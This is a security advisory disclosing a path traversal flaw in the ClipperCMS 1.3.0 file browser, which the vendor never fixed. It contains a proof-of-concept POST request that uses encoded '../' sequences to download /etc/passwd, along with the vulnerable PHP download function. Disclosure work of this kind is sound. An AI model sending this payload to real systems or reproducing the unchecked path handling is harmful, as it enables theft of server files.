ClipperCMS 1.3.0: Path Traversal

ClipperCMS 1.3.0: Path Traversal

Date: 2015-11-13 11:41:02
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website:
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Vulnerability Description


Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N


The "file" Parameter of the file browser is vulnerable to directory traversal, allowing the download of arbitrary files.

A user account is needed with at least the lowest default role, which is "Editor".

3. Proof of Concept

POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1 dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

4. Code

/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php protected function act_download() { $dir = $this->postDir(); if (!isset($this->post['dir']) || !isset($this->post['file']) || (false === ($file = "$dir/{$this->post['file']}")) || !file_exists($file) || !is_readable($file) ) $this->errorMsg("Unknown error."); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private", false); header("Content-Type: application/octet-stream"); header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"'); header("Content-Transfer-Encoding:­ binary"); header("Content-Length: " . filesize($file)); readfile($file); die; }

5. Solution

This issue has not been fixed by the vendor.

6. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public